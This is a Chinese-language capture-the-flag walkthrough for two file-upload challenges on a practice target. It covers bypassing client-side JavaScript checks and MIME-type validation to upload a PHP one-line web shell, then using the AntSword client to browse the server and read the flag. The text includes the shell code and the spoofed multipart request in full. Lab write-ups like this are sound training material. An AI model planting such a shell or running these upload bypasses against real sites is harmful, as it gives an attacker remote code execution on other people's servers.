https://buuoj.cn/challenges#Upload-Labs-Linux
点击部署靶机。

https://blog.csdn.net/yzl_007/article/details/119395730

$ cat shell.php
<?php eval(@$_POST['a']); ?>

Pass-01（前端验证）

Firefox -> about:config -> javascript.enabled: false
在 Firefox 中禁用 javascript，刷新页面，上传 shell.php
上传成功后，显示一幅损坏的图像，在该图像上右击鼠标，选择“复制图像链接”，得到：
http://8c8d5584-d623-42f5-9daa-b096843f9360.node4.buuoj.cn:81/upload/shell.php

$ AntSword &  # 启动中国蚁剑
在主画面点击鼠标右键，选择“添加数据”
URL地址 ：http://....node4.buuoj.cn:81/upload/shell.php
连接密码：a
点击“添加”按钮，得到一行数据，物理位置：江西省九江市 电信
双击这行数据，得到
目录列表         文件列表
/                新建 上层 刷新 主目录
- var            -- 名称       日期                 大小  属性
-- www           -- shell.php  2023-07-22 12:46:47  29 b  0644
--- html
---- upload

双击左边的 / （根目录），再双击“文件列表”中的 flag，得到：
flag{e08d30bc-69a3-4df6-9e2b-7a2af6d54900}
完成后在中国蚁剑的 shell.php 中点击鼠标右键，选择“删除文件”。


Pass-02（MIME验证）
使用 Burp Suite，在 Repeater 中，将下面的“application/x-php”修改为“image/png”后“Send”
-----------------------------34466352137794768323446927597
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: application/x-php

<?php eval(@$_POST['a']); ?>

-----------------------------34466352137794768323446927597

在 Response 中看到：
<div id="img"><img src="../upload/shell.php" width="250px" /></div>

$ AntSword &  # 启动中国蚁剑
后面的步骤与 Pass-01 相同
